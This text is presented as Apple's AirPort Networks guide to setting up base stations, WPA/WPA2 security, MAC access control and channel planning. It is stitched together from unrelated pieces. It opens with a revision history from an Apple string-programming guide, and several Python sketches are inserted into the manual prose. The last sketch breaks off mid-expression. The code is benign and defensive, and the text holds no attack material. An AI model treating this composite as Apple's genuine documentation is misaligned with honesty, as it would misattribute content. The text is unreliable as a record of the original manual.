2003-09-09  Added NSNumericSearch description to “Searching, Comparing, and Sorting Strings” (page 22).
2003-03-17  Reinstated the sample code that was missing from “Scanners” (page 36).
2003-01-17  Updated “Creating and Converting String Objects” (page 8) to recommend the use of UTF8 encoding, and noted the pending deprecation of the cString... methods.
2002-11-12  Revision history was added to existing topic.
Apple Inc.
© 1997, 2012 Apple Inc. All rights reserved.

No part of this publication may be reproduced, stored in a retrieval system, or transmitted, in any form or by any means, mechanical, electronic, photocopying, recording, or otherwise, without prior written permission of Apple Inc., with the following exceptions: Any person is hereby authorized to store documentation on a single computer for personal use only and to print copies of documentation for personal use provided that the documentation contains Apple’s copyright notice.

No licenses, express or implied, are granted with respect to any of the technology described in this document. Apple retains all intellectual property rights associated with the technology described in this document. This document is intended to assist application developers to develop applications only for Apple-labeled computers.

Apple Inc.
1 Infinite Loop
Cupertino, CA 95014
408-996-1010

Apple, the Apple logo, Cocoa, Finder, Mac, Macintosh, Objective-C, OS X, and Safari are trademarks of Apple Inc., registered in the U.S. and other countries.

Even though Apple has reviewed this document, APPLE MAKES NO WARRANTY OR REPRESENTATION, EITHER EXPRESS OR IMPLIED, WITH RESPECT TO THIS DOCUMENT, ITS QUALITY, ACCURACY, MERCHANTABILITY, OR FITNESS FOR A PARTICULAR PURPOSE. AS A RESULT, THIS DOCUMENT IS PROVIDED “AS IS,” AND YOU, THE READER, ARE ASSUMING THE ENTIRE RISK AS TO ITS QUALITY AND ACCURACY.
IN NO EVENT WILL APPLE BE LIABLE FOR DIRECT, INDIRECT, SPECIAL, INCIDENTAL, OR CONSEQUENTIAL DAMAGES RESULTING FROM ANY DEFECT OR INACCURACY IN THIS DOCUMENT, even if advised of the possibility of such damages.

THE WARRANTY AND REMEDIES SET FORTH ABOVE ARE EXCLUSIVE AND IN LIEU OF ALL OTHERS, ORAL OR WRITTEN, EXPRESS OR IMPLIED. No Apple dealer, agent, or employee is authorized to make any modification, extension, or addition to this warranty.

Some states do not allow the exclusion or limitation of implied warranties or liability for incidental or consequential damages, so the above limitation or exclusion may not apply to you. This warranty gives you specific legal rights, and you may also have other rights which vary from state to state.

Apple AirPort Networks

Contents

Chapter 1 Getting Started
    Configuring an Apple Wireless Device for Internet Access Using AirPort Utility
    Extending the Range of Your AirPort Network
    Sharing a USB Hard Disk Connected to an AirPort Extreme Base Station or Time Capsule
    Printing with an Apple Wireless Device
    Sharing Your Computer’s Internet Connection
Chapter 2 AirPort Security
    Security for AirPort Networks at Home
    Security for AirPort Networks in Businesses and Classrooms
    Wi-Fi Protected Access (WPA) and WPA2
Chapter 3 AirPort Network Designs
    Using AirPort Utility
    Setting Up the AirPort Extreme Network
    Configuring and Sharing Internet Access
    Setting Advanced Options
    Extending the Range of an 802.11n Network
    Keeping Your Network Secure
    Directing Network Traffic to a Specific Computer on Your Network (Port Mapping)
    Logging
    Using Back to My Mac on your Wireless Network
    Setting up IPv6
    Sharing and Securing USB Hard Disks on Your Network
    Using a Time Capsule in Your Network
    Connecting a USB Printer to an Apple Wireless Device
    Adding a Wireless Client to Your 802.11n Network
    Solving Problems
Chapter 4 Behind the Scenes
    Basic Networking
    Items That Can Cause Interference with AirPort
Glossary

Chapter 1 Getting Started

AirPort offers the easiest way to provide wireless Internet access and networking anywhere in the home, classroom, or office.

AirPort is based on the latest Institute of Electrical and Electronics Engineers (IEEE) 802.11n draft specification and provides fast and reliable wireless networking in the home, classroom, or small office. You can enjoy data transfer rates up to five times faster than those provided by the 802.11g standard, and more than twice the network range.

The new AirPort Extreme Base Station and the new Time Capsule are based on simultaneous dual-band technology, so they work in both the 2.4 gigahertz (GHz) and 5 GHz spectrum at the same time. And they are 100 percent backward-compatible, so Mac computers and PCs that use 802.11a, 802.11b, 802.11g, or IEEE draft specification 802.11n wireless cards can connect to an AirPort wireless network. They also work flawlessly with the AirPort Express for wireless music streaming and more. The AirPort Extreme Base Station and Time Capsule have three additional 10/100/1000BaseT Gigabit Ethernet ports, so you don’t need to include another router in your network.

To set up an AirPort Extreme Base Station, an AirPort Express, or a Time Capsule, you use AirPort Utility, the easy-to-use setup and management application. AirPort Utility has a simple user experience, with all software controls accessible from the same application. It provides better management of several Apple wireless devices, with client-monitoring features and logging.

If you’re using AirPort Utility version 5.4 or later, you can set up a guest network, in both the 2.4 GHz and 5 GHz bands, so that guests can connect to the Internet using your AirPort network, while you keep your private network secure.
You can also choose to set up guest accounts that expire, to grant temporary access to your network; you no longer need to give your network password to visitors in your home or office. You can even set up accounts with time constraints for the best in parental controls. AirPort Utility supports IPv6 and Bonjour, so you can “advertise” network services such as printing and sharing a hard disk over the Wide Area Network (WAN) port.

Note: When the features discussed in this document apply to the AirPort Extreme Base Station, AirPort Express, and Time Capsule, the devices are referred to collectively as Apple wireless devices.

With an AirPort Extreme Base Station or a Time Capsule, you can connect a USB hard disk so that everyone on the network can back up, store, and share files. Every Time Capsule includes an internal AirPort disk, so you don’t need to connect an external one. If you want, you can connect additional USB disks to the USB port on your Time Capsule. You can also connect a USB printer to the USB port on any Apple wireless device, so that everyone on the network can access the printer or hub.

All Apple wireless devices provide strong, wireless security. They offer a built-in firewall and support industry-standard encryption technologies. Yet the simple setup utility and powerful access controls make it easy for authorized users to connect to the AirPort network they create.

You can use an Apple wireless device to provide wireless Internet access and share a single Internet connection among several computers in the following ways:

● Set up the device to act as a router and provide Internet Protocol (IP) addresses to computers on the network using Dynamic Host Configuration Protocol (DHCP) and Network Address Translation (NAT). When the wireless device is connected to a DSL or cable modem that is connected to the Internet, it receives webpages and email content from the Internet through its Internet connection, and then sends the content to wireless-enabled computers, using the wireless network or using Ethernet if there are computers connected to the Ethernet ports.
● Set up the Apple wireless device to act as a bridge on an existing network that already has Internet access and a router providing IP addresses. The device passes IP addresses and the Internet connection to AirPort or wireless-enabled computers, or computers connected to the wireless device by Ethernet.

This document provides information about the latest AirPort Extreme Base Station, AirPort Express, and Time Capsule, and detailed information about designing 802.11n networks with AirPort Utility for computers using Mac OS X v10.5 or later, and Windows Vista or Windows XP with Service Pack 2. If you’re using previous versions of Mac OS X, or are setting up earlier versions of AirPort devices, you’ll find more information at www.apple.com/support/airport.

You can set up an Apple wireless device and connect to the Internet wirelessly in minutes. But because Apple wireless devices are flexible and powerful networking products, you can also create an AirPort network that does much more. If you want to design an AirPort network that provides Internet access to non-AirPort computers via Ethernet, or take advantage of some of your wireless device’s more advanced features, use this document to design and implement your network. You can find more general wireless networking information and an overview of AirPort technology in the earlier AirPort documents, located at www.apple.com/support/manuals/airport.

Note: The images of AirPort Utility in this document are from Mac OS X v10.5.
If you’re using a Windows computer, the images you see in this document may be slightly different from what you see on your screen.

Configuring an Apple Wireless Device for Internet Access Using AirPort Utility

Like your computer, Apple wireless devices must be set up with the appropriate hardware and IP networking information to connect to the Internet. Install AirPort Utility, which came on the CD with your wireless device, and use it to provide Internet configuration information and other network settings.

AirPort Utility combines the ease of use of AirPort Setup Assistant and the power of AirPort Admin Utility. It is installed in the Utilities folder in the Applications folder on a Macintosh computer using Mac OS X, and in Start > All Programs > AirPort on computers using Windows. AirPort Utility walks you through the setup process by asking a series of questions to determine how the device’s Internet connection and other interfaces should be set up. Enter the settings you received from your ISP or network administrator for Ethernet, PPP over Ethernet (PPPoE), or your local area network (LAN); give your AirPort network a name and password; set up a device as a wireless bridge to extend the range of your existing AirPort network; and set other options.

When you’ve finished entering the settings, AirPort Utility transfers the settings to your wireless device. Then it connects to the Internet and shares its Internet connection with computers that join its AirPort network.

You can also create an AirPort network that takes advantage of the more advanced networking features of Apple wireless devices. To set more advanced AirPort options, use AirPort Utility to manually set up your wireless device’s configuration, or make quick adjustments to one you’ve already set up. Some of the AirPort advanced networking features can be configured only using the manual setup features in AirPort Utility.
Set up your Apple wireless device manually using AirPort Utility when:

● You want to provide Internet access to computers that connect to the wireless device using Ethernet
● You’ve already set up your device, but you need to change one setting, such as your account information
● You need to configure advanced settings such as channel frequency, advanced security options, closed networks, DHCP lease time, access control, WAN privacy, power controls, or port mapping or other options

For instructions on using AirPort Utility to manually set up your wireless device and network, see “Using AirPort Utility” on page 15.

Extending the Range of Your AirPort Network

You can extend the range of your network by using AirPort Utility to set up wireless connections among several devices in your network, or to connect a device using Ethernet to create a roaming network. For more information on extending the range of your network, see “Connecting Additional Wireless Devices to Your AirPort Network” on page 41.

Sharing a USB Hard Disk Connected to an AirPort Extreme Base Station or Time Capsule

If you’re using an AirPort Extreme Base Station or a Time Capsule, you can connect a USB hard disk to it, and computers connected to the network (wired or wireless, Mac or Windows) can share files using the hard disk. Every Time Capsule includes an internal AirPort disk, so you don’t need to connect an external one. If you want, you can connect additional USB disks to the USB port on your Time Capsule. See “Sharing and Securing USB Hard Disks on Your Network” on page 54.

Printing with an Apple Wireless Device

If you have a compatible USB printer connected to your Apple wireless device, computers on the AirPort network can use Bonjour (Apple’s zero-configuration networking technology) to print to the printer. For instructions about printing to a USB printer from a computer, see “Connecting a USB Printer to an Apple Wireless Device” on page 55.
Sharing Your Computer’s Internet Connection If your computer is connected to the Internet, you can share your Internet connection with other computers using Mac OS X version 10.2 or later, or Windows XP with Service Pack 2. This is sometimes called using your computer as a software base station.Chapter 1 Getting Started 7 You can share your Internet connection as long as your computer is connected to the Internet. If your computer goes to sleep or is restarted, or if you lose your Internet connection, you need to restart Internet sharing. To start Internet sharing on a computer using Mac OS X v10.5 or later: 1 Open System Preferences and click Sharing. 2 Choose the port you want to use to share your Internet connection from the “Share your connection using” pop-up menu. 3 Select the port you want to use to share your Internet connection in the “To computers using” list. You can choose to share your Internet connection with AirPort-enabled computers or computers with built-in Ethernet, for example. 4 Select Internet Sharing in the Services list. 5 If you want to share your Internet connection with computers using AirPort, click AirPort Options to give your network a name and password. 8 Chapter 1 Getting Started To start Internet sharing on a computer using Windows: 1 Open Control Panel from the Start menu, and then click “Network and Internet.” 2 Click “Network and Sharing Center.” 3 Click “Manage network connections” in the Tasks list. 4 Right-click the network connection you want to share, and then select Properties. 5 Click Sharing and then select “Allow other network users to connect through this computer’s Internet connection.” Note: If your Internet connection and your local network use the same port (built-in Ethernet, for example), contact your ISP before you turn on Internet sharing. 
In some cases (if you use a cable modem, for example) you might unintentionally affect the network settings of other ISP customers, and your ISP might terminate your service to prevent you from disrupting its network.

The following chapters explain AirPort security options, AirPort network design and setup, and other advanced options.

Chapter 2: AirPort Security

This chapter provides an overview of the security features available in AirPort.

Apple has designed its wireless devices to provide several levels of security, so you can enjoy peace of mind when you access the Internet, manage online financial transactions, or send and receive email. The AirPort Extreme Base Station and Time Capsule also include a slot for inserting a lock to deter theft. For information and instructions for setting up these security features, see “Setting Up the AirPort Extreme Network” on page 17.

Security for AirPort Networks at Home

Apple gives you ways to protect your wireless AirPort network as well as the data that travels over it.

NAT Firewall

You can isolate your wireless network with firewall protection. Apple wireless devices have a built-in Network Address Translation (NAT) firewall that creates a barrier between your network and the Internet, protecting data from Internet-based IP attacks. The firewall is automatically turned on when you set up the device to share a single Internet connection. For computers with a cable or DSL modem, AirPort can actually be safer than a wired connection.

Closed Network

Creating a closed network keeps the network name and the very existence of your network private. Prospective users of your network must know the network name and password to access it.
Use AirPort Utility, located in the Utilities folder in the Applications folder on a Macintosh computer using Mac OS X, or in Start > All Programs > AirPort on a computer using Windows, to create a closed network.

Password Protection and Encryption

AirPort uses password protection and encryption to deliver a level of security comparable to that of traditional wired networks. Users can be required to enter a password to log in to the AirPort network. When transmitting data and passwords, the wireless device uses up to 128-bit encryption, through Wi-Fi Protected Access (WPA), WPA2, or Wired Equivalent Privacy (WEP), to scramble data and help keep it safe. If you’re setting up an 802.11n-based AirPort device, you can also use WEP (Transitional Security Network) if both WEP-compatible and WPA/WPA2-compatible computers will join your network.

Note: WPA security is available only to AirPort Extreme wireless devices; AirPort and AirPort Extreme clients using Mac OS X 10.3 or later and AirPort 3.3 or later; and to non-Apple clients using other 802.11 wireless adapters that support WPA. WPA2 security requires firmware version 5.6 or later for an AirPort Extreme Base Station, firmware version 6.2 or later for an AirPort Express, firmware version 7.3 or later for a Time Capsule, and a Macintosh computer with an AirPort Extreme wireless card using AirPort 4.2 or later. If your computer uses Windows XP or Windows Vista, check the documentation that came with your computer to see if your computer supports WPA2.

Security for AirPort Networks in Businesses and Classrooms

Businesses and schools need to restrict network communications to authorized users and keep data safe from prying eyes. To meet this need, Apple wireless devices and software provide a robust suite of security mechanisms. Use AirPort Utility to set up these advanced security features.
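The WPA2 firmware minimums listed in the note above can be checked mechanically. The following Python sketch is illustrative only: the table copies the version numbers from the note, while the function names and the dotted-string firmware format are assumptions made for this example and are not part of AirPort Utility.

```python
# Minimum firmware for WPA2, as stated in the note above.
MIN_WPA2_FIRMWARE = {
    "AirPort Extreme Base Station": (5, 6),
    "AirPort Express": (6, 2),
    "Time Capsule": (7, 3),
}


def parse_version(text):
    """Turn a dotted version string such as '7.3.1' into a tuple of ints."""
    return tuple(int(part) for part in text.split("."))


def supports_wpa2(device, firmware):
    """Return True if the firmware meets the documented WPA2 minimum.

    Comparing tuples of integers avoids the string-comparison trap where
    '5.10' would sort before '5.6'.
    """
    return parse_version(firmware) >= MIN_WPA2_FIRMWARE[device]


if __name__ == "__main__":
    print(supports_wpa2("AirPort Express", "6.1"))
    print(supports_wpa2("Time Capsule", "7.3.1"))
```

The client-side requirements in the note (AirPort 4.2 or later on the Macintosh, for example) are not modeled here.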
Transmitter Power Control

Because radio waves travel in all directions, they can extend outside the confines of a specific building. The Transmit Power setting in AirPort Utility lets you adjust the transmission range of your device’s network. Only users within the network vicinity have access to the network.

MAC Address Access Control

Every AirPort and wireless card has a unique Media Access Control (MAC) address. For AirPort Cards and AirPort Extreme Cards, the MAC address is sometimes referred to as the AirPort ID. Support for MAC address access control lets administrators set up a list of MAC addresses and restrict access to the network to only those users whose MAC addresses are in the access control list.

RADIUS Support

The Remote Authentication Dial-In User Service (RADIUS) makes securing a large network easy. RADIUS is an access control protocol that allows a system administrator to create a central list of the user names and passwords of computers that can access the network. Placing this list on a centralized server allows many wireless devices to access the list and makes it easy to update. If the MAC address of a user’s computer (which is unique to each 802.11 wireless card) is not on your approved MAC address list, the user cannot join your network.

Wi-Fi Protected Access (WPA) and WPA2

There has been increasing concern about the vulnerabilities of WEP. In response, the Wi-Fi Alliance, in conjunction with the IEEE, has developed enhanced, interoperable security standards called Wi-Fi Protected Access (WPA) and WPA2. WPA and WPA2 use specifications that bring together standards-based, interoperable security mechanisms that significantly increase the level of data protection and access control for wireless LANs. WPA and WPA2 provide wireless LAN users with a high-level assurance that their data remains protected and that only authorized network users can access the network.
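The access control list described under MAC Address Access Control amounts to a membership test on normalized addresses. The Python sketch below illustrates that idea only; the function names and the example addresses are hypothetical, and it does not represent how an Apple wireless device stores or evaluates its list.

```python
import re

_SEPARATORS = re.compile(r"[:\-.]")
_HEX12 = re.compile(r"[0-9a-f]{12}")


def normalize_mac(mac):
    """Return a MAC address as 12 lowercase hex digits, or raise ValueError."""
    candidate = _SEPARATORS.sub("", mac.strip()).lower()
    if not _HEX12.fullmatch(candidate):
        raise ValueError(f"not a MAC address: {mac!r}")
    return candidate


def is_allowed(mac, access_list):
    """Return True if the address appears in the set of normalized entries."""
    return normalize_mac(mac) in access_list


# Hypothetical addresses, used only for this example.
ACCESS_LIST = {
    normalize_mac(entry)
    for entry in ("00:1B:63:AA:BB:CC", "00-1e-52-11-22-33")
}

if __name__ == "__main__":
    for client in ("00:1b:63:aa:bb:cc", "00:1B:63:AA:BB:CD"):
        verdict = "join" if is_allowed(client, ACCESS_LIST) else "refuse"
        print(client, verdict)
```

Normalizing before comparing matters because the same address can be written with colons, hyphens, or dots, in either case.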
A wireless network that uses WPA or WPA2 requires all computers that access the wireless network to have WPA or WPA2 support. WPA provides a high level of data protection and (when used in Enterprise mode) requires user authentication.

The main standards-based technologies that constitute WPA include Temporal Key Integrity Protocol (TKIP), 802.1X, Message Integrity Check (MIC), and Extensible Authentication Protocol (EAP).

TKIP provides enhanced data encryption by addressing the WEP encryption vulnerabilities, including the frequency with which keys are used to encrypt the wireless connection. 802.1X and EAP provide the ability to authenticate a user on the wireless network.

802.1X is a port-based network access control method for wired as well as wireless networks. The IEEE adopted 802.1X as a standard in August 2001.

The Message Integrity Check (MIC) is designed to prevent an attacker from capturing data packets, altering them, and resending them. The MIC provides a strong mathematical function in which the receiver and the transmitter each compute and then compare the MIC. If they do not match, the data is assumed to have been tampered with and the packet is dropped. If multiple MIC failures occur, the network may initiate countermeasures.

The EAP protocol known as TLS (Transport Layer Security) presents a user’s information in the form of digital certificates. A user’s digital certificates can comprise user names and passwords, smart cards, secure IDs, or any other identity credentials that the IT administrator is comfortable using. WPA uses a wide variety of standards-based EAP implementations, including EAP-Transport Layer Security (EAP-TLS), EAP-Tunnel Transport Layer Security (EAP-TTLS), and Protected Extensible Authentication Protocol (PEAP).
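The compute-and-compare behavior of the Message Integrity Check described earlier in this section can be sketched in a few lines of Python. This is an illustration under stated assumptions: it uses HMAC-SHA-256 from the standard library as a stand-in keyed function, which is not the algorithm WPA actually uses, and the function names and the 8-byte truncation are choices made for this example.

```python
import hashlib
import hmac


def compute_mic(key, payload):
    """Compute a keyed integrity value over the payload.

    HMAC-SHA-256 is a stand-in here; the truncation to 8 bytes is only
    to keep the example value short.
    """
    return hmac.new(key, payload, hashlib.sha256).digest()[:8]


def receive(key, payload, mic):
    """Recompute the MIC on the receiving side and compare.

    Returns the payload if the values match, or None to model a dropped
    packet when they do not.
    """
    expected = compute_mic(key, payload)
    if not hmac.compare_digest(expected, mic):
        return None
    return payload


if __name__ == "__main__":
    key = b"shared-session-key"            # hypothetical key material
    packet = b"transfer 10 to account 42"  # hypothetical payload
    mic = compute_mic(key, packet)
    print(receive(key, packet, mic) is not None)
    print(receive(key, b"transfer 99 to account 42", mic) is not None)
```

The countermeasures that follow repeated MIC failures are not modeled in this sketch.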
AirPort Extreme also supports the Lightweight Extensible Authentication Protocol (LEAP), a security protocol used by Cisco access points to dynamically assign a different WEP key to each user. AirPort Extreme is compatible with Cisco’s LEAP security protocol, enabling AirPort users to join Cisco-hosted wireless networks using LEAP.

In addition to TKIP, WPA2 supports the AES-CCMP encryption protocol. Based on the very secure AES national standard cipher, combined with sophisticated cryptographic techniques, AES-CCMP was specifically designed for wireless networks.

Migrating from WEP to WPA2 requires new firmware for the AirPort Extreme Base Station (version 5.6 or later), and for AirPort Express (version 6.2 or later). Devices using WPA2 mode are not backward compatible with WEP.

WPA and WPA2 have two modes:
• Personal mode, which relies on the capabilities of TKIP or AES-CCMP without requiring an authentication server
• Enterprise mode, which uses a separate server, such as a RADIUS server, for user authentication

WPA and WPA2 Personal

• For home or Small Office/Home Office (SOHO) networks, WPA and WPA2 operate in Personal mode, taking into account that the typical household or small office does not have an authentication server. Instead of authenticating with a RADIUS server, users manually enter a password to log in to the wireless network. When a user enters the password correctly, the wireless device starts the encryption process using TKIP or AES-CCMP. TKIP or AES-CCMP takes the original password and derives encryption keys mathematically from the network password. The encryption key is regularly changed and rotated so that the same encryption key is never used twice.
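As an illustration of how a key can be derived mathematically from the network password, the sketch below follows the passphrase-to-key mapping defined in IEEE 802.11i: PBKDF2 with HMAC-SHA1, the network name as salt, 4096 iterations, and a 256-bit result. The function name and the sample passphrase and network name are hypothetical. The sketch covers only this first step; the per-session keys that TKIP or AES-CCMP actually encrypt with are negotiated afterward and are not shown.

```python
import hashlib


def derive_psk(passphrase, ssid):
    """Derive the 256-bit pre-shared key from a passphrase and network name."""
    if not 8 <= len(passphrase) <= 63:
        raise ValueError("passphrase must be 8 to 63 characters")
    if any(not 32 <= ord(ch) <= 126 for ch in passphrase):
        raise ValueError("passphrase must be printable ASCII")
    # PBKDF2-HMAC-SHA1, network name as salt, 4096 iterations, 32-byte output.
    return hashlib.pbkdf2_hmac(
        "sha1", passphrase.encode("ascii"), ssid.encode("utf-8"), 4096, 32
    )


if __name__ == "__main__":
    # Hypothetical passphrase and network name.
    key = derive_psk("correct horse battery", "Example Network")
    print(key.hex())
```

Because the network name is part of the derivation, the same password on two differently named networks yields two different keys.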
Other than entering the network password, the user isn’t required to do anything to make WPA or WPA2 Personal work in the home.

WPA and WPA2 Enterprise

WPA is a subset of the draft IEEE 802.11i standard and effectively addresses the wireless local area network (WLAN) security requirements for the enterprise. WPA2 is a full implementation of the ratified IEEE 802.11i standard. In an enterprise with IT resources, WPA should be used in conjunction with an authentication server such as RADIUS to provide centralized access control and management. With this implementation in place, the need for add-on solutions such as virtual private networks (VPNs) may be eliminated, at least for securing wireless connections in a network.

For more information about setting up a WPA or WPA2 protected network, see “Using Wi-Fi Protected Access” on page 45.

Chapter 3: AirPort Network Designs

This chapter provides overview information and instructions for the types of AirPort Extreme networks you can set up, and some of the advanced options of AirPort Extreme.

Use this chapter to design and set up your AirPort Extreme network.

Configuring your Apple wireless device to implement a network design requires three steps:

Step 1: Setting Up the AirPort Extreme Network
Computers communicate with the wireless device over the AirPort wireless network. When you set up the AirPort network created by the wireless device, you can name the wireless network, assign a password that will be needed to join the wireless network, and set other options.

Step 2: Configuring and Sharing Internet Access
When computers access the Internet through the AirPort Extreme network, the wireless device connects to the Internet and transmits information to the computers over the AirPort Extreme network. You provide the wireless device with settings appropriate for your ISP and configure how the device shares this connection with other computers.
Step 3: Setting Advanced Options
These settings are optional for most users. They include using the Apple wireless device as a bridge between your AirPort Extreme network and an Ethernet network, setting advanced security options, extending the AirPort network to other wireless devices, and fine-tuning other settings.

For specific instructions on all these steps, refer to the sections later in this chapter.

You can do most of your setup and configuration tasks using AirPort Utility, and following the onscreen instructions to enter your ISP and network information. To set advanced options, you need to use AirPort Utility to manually set up your Apple wireless device and AirPort network.

Using AirPort Utility

To set up and configure your computer or Apple wireless device to use AirPort Extreme for basic wireless networking and Internet access, use AirPort Utility and answer a series of questions about your Internet settings and how you would like to set up your network.
1 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer.
2 Select your device in the list on the left if there is more than one device in your network. Click Continue, and then follow the onscreen instructions to enter the settings from your ISP or network administrator for the type of network you want to set up.

See the network diagrams later in this chapter for the types of networks you can set up using AirPort Utility.

To set up a more complicated network, or to make adjustments to a network you’ve already set up, use the manual setup features in AirPort Utility.

Setting AirPort preferences

Use AirPort preferences to set up your wireless device to alert you when there are updates available for your device. You can also set it up to notify you if there are problems detected, and to provide instructions to help solve the problems.
To set AirPort preferences:
1 Open AirPort Utility, located in the Utilities folder inside the Applications folder on a Mac, and in Start > All Programs > AirPort on a Windows computer.
2 Do one of the following:
• On a Mac, choose AirPort Utility > Preferences
• On a Windows computer, choose File > Preferences

Select from the following checkboxes:
• Select “Check for Updates when opening AirPort Utility” to automatically check the Apple website for software and firmware updates each time you open AirPort Utility.
• Select the “Check for updates” checkbox, and then choose a time interval from the pop-up menu, such as weekly, to check for software and firmware updates in the background. AirPort Utility opens if updates are available.
• Select “Monitor Apple wireless devices for problems” to investigate problems that may cause the device’s status light to blink amber. With the checkbox selected, AirPort Utility opens if a problem is detected, and then provides instructions to help resolve the problem. This option monitors all of the wireless devices on the network.
• Select “Only Apple wireless devices that I have configured” to monitor only the devices you’ve set up using this computer.

Monitoring devices for problems requires an AirPort wireless device that supports firmware version 7.0 or later.

To set up your wireless device manually:
1 Open AirPort Utility, located in the Utilities folder in the Applications folder on a Mac, or in Start > All Programs > AirPort on a Windows computer.
2 Select your device in the list.
3 Choose Base Station > Manual Setup and enter the password if necessary. The default device password is public.

If you don’t see your wireless device in the list:
1 Open the AirPort status menu in the menu bar on a Mac and make sure that you’ve joined the AirPort network created by your wireless device.
On a Windows computer, hover the cursor over the wireless network icon in the status tray to make sure the computer is connected to the correct network.
The default network name for an Apple wireless device is AirPort Network XXXXXX, where XXXXXX is replaced with the last six digits of the AirPort ID (or MAC address). The AirPort ID is printed on the bottom of Apple wireless devices.
2 Make sure your computer’s network and TCP/IP settings are configured properly.
On a computer using Mac OS X, choose AirPort from the Show pop-up menu in the Network pane of System Preferences. Then choose Using DHCP from the Configure IPv4 pop-up menu in the TCP/IP pane.
On a computer using Windows, right-click the wireless connection icon that displays the AirPort network, and choose Status. Click Properties, select Internet Protocol (TCP/IP), and then click Properties. Make sure “Obtain an IP address automatically” is selected.

If you can’t open the wireless device settings:
1 Make sure your network and TCP/IP settings are configured properly.
On a computer using Mac OS X, select AirPort from the network connection services list in the Network pane of System Preferences. Click Advanced, and then choose Using DHCP from the Configure IPv4 pop-up menu in the TCP/IP pane.
On a computer using Windows, right-click the wireless connection icon that displays the AirPort network, and choose Status. Click Properties, select Internet Protocol (TCP/IP), and then click Properties. Make sure “Obtain an IP address automatically” is selected.
2 Make sure you entered the wireless device password correctly. The default password is public. If you’ve forgotten the device password, you can reset it to public by resetting the device.
To temporarily reset the device password to public, hold down the reset button for one second. To reset the device back to its default settings, hold the reset button for five full seconds.
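The default network name rule mentioned above (AirPort Network followed by the last six digits of the AirPort ID) can be expressed as a small Python function, which may help when matching a device label to a network in a list. The function name and the sample AirPort ID are hypothetical, and the choice to print the digits in lowercase is an assumption; the text does not say which case the device uses.

```python
import re


def default_network_name(airport_id):
    """Build the default network name from an AirPort ID (MAC address).

    Accepts the ID with or without ':' or '-' separators. Lowercase
    output is an assumption made for this sketch.
    """
    digits = airport_id.replace(":", "").replace("-", "").strip().lower()
    if not re.fullmatch(r"[0-9a-f]{12}", digits):
        raise ValueError(f"not an AirPort ID: {airport_id!r}")
    return f"AirPort Network {digits[-6:]}"


if __name__ == "__main__":
    # Hypothetical AirPort ID as it might appear on the device label.
    print(default_network_name("00:1B:63:AA:BB:CC"))
```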
If you’re on an Ethernet network that has other devices, or you’re using Ethernet to connect to the device:
AirPort Utility scans the Ethernet network to create the list of devices. As a result, when you open AirPort Utility, you may see devices that you cannot configure.

Setting Up the AirPort Extreme Network

The first step in configuring your Apple wireless device is setting up the device and the network it will create. You can set up most features using AirPort Utility and following the onscreen instructions to enter the information from your ISP or network administrator.

To configure a network manually or set advanced options, open your wireless device’s configuration in AirPort Utility and manually set up your device and network.
1 Choose the network of the wireless device you want to configure from the AirPort status menu on a computer using Mac OS X, or from the wireless connection icon in the status tray on a computer using Windows.
2 Open AirPort Utility and select the wireless device from the list. If you don’t see the device you want to configure, click Rescan to scan for available wireless devices, and then select the one you want from the list.
3 Choose Base Station > Manual Setup and enter the password if necessary. The default device password is public.

You can also double-click the name of the wireless device to open its configuration in a separate window. When you open the manual setup window, the Summary pane is displayed. The summary pane provides information and status about your wireless device and network.

If the wireless device reports a problem, the status icon turns yellow. Click Base Station Status to display the problem and suggestions to resolve it.

Wireless Device Settings

Click the AirPort button, and then click Base Station or Time Capsule, depending on the device you’re setting up, to enter information about the wireless device.
Give the Device a Name

Give the device an easily identifiable name. This makes it easy for administrators to locate a specific device on an Ethernet network with several devices.

Change the Device Password

The device password protects its configuration so that only the administrator can modify it. The default password is public. It is a good idea to change the device password to prevent unauthorized changes to it.

If the password is not changed from public, you won’t be prompted for a password when you select it from the list and click Configure.

Other Information

• Allow configuration over the WAN port. This allows you to administer the wireless device remotely.
• Advertise the wireless device over the Internet using Bonjour. If you have an account with a dynamic DNS service, you can connect to it over the Internet.
• Set the device time automatically. If you have access to a Network Time Protocol server, whether on your network or on the Internet, choose it from the pop-up menu. This ensures your wireless device is set to the correct time.

Set Device Options

Click Base Station Options and set the following:
• Enter a contact name and location for the wireless device. The name and location are included in some logs the device generates. The contact and location fields may be helpful if you have more than one wireless device on your network.
• Set status light behavior to either Always On or Flash On Activity. If you choose Flash On Activity, the device status light blinks when there is network traffic.
• If your wireless device supports it, select “Check for firmware updates” and choose an increment, such as Daily, from the pop-up menu.

Wireless Network Settings

Click Wireless, and enter the network name, radio mode, and other wireless information.

Setting the Wireless Mode

AirPort Extreme supports two wireless modes:
• Create a wireless network. Choose this option if you’re creating a new AirPort Extreme network.
• Extend a wireless network. Choose this option if you plan to connect another Apple wireless device to the network you’re setting up.

Naming the AirPort Extreme Network

Give your AirPort network a name. This name appears in the AirPort status menu on the AirPort-enabled computers that are in range of your AirPort network.

Choosing the Radio Mode

Choose 802.11a/n - 802.11b/g from the Radio Mode pop-up menu if computers with 802.11a, 802.11n, 802.11g, or 802.11b wireless cards will join the network. Each client computer will connect to the network and transmit network traffic at the highest possible speed.

Choose 802.11n - 802.11b/g if only computers with 802.11n, 802.11b, or 802.11g compatible wireless cards will join the network.

Note: If you don’t want to use an 802.11n radio mode, hold down the Option key and choose a radio mode that doesn’t include 802.11n.

Changing the Channel

The “channel” is the radio frequency over which your wireless device communicates. If you use only one device (for example, at home), you probably won’t need to change the channel frequency. If you set up several wireless devices in a school or office, use different channel frequencies for devices that are within approximately 150 feet of each other.

Adjacent wireless devices should have at least 4 channels between their channel frequencies. So if device A is set to channel 1, device B should be set to channel 6 or 11. For best results, use channels 1, 6, or 11 when operating your device in the 2.4 GHz range.

Choose Manually from the Radio Channel Selection pop-up menu, and then click Edit to set the channels manually.

AirPort-enabled computers automatically tune to the channel frequency your wireless device is using when they join the AirPort network. If you change the channel frequency, AirPort client computers do not need to make any changes.
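The channel spacing guideline under Changing the Channel (at least 4 channels between adjacent devices, so channels 1, 6, and 11 work together) can be checked with a short Python sketch when planning several devices. The function names and device labels are hypothetical, and the sketch assumes every listed device is within range of every other one.

```python
from itertools import combinations

MIN_CHANNELS_BETWEEN = 4  # from the guideline in the text


def channels_between(a, b):
    """Count the channels that lie strictly between two channel numbers."""
    return max(abs(a - b) - 1, 0)


def conflicts(assignments):
    """Return pairs of device names whose channels are too close together.

    `assignments` maps a device name to its 2.4 GHz channel number.
    """
    return [
        (name_a, name_b)
        for (name_a, chan_a), (name_b, chan_b)
        in combinations(sorted(assignments.items()), 2)
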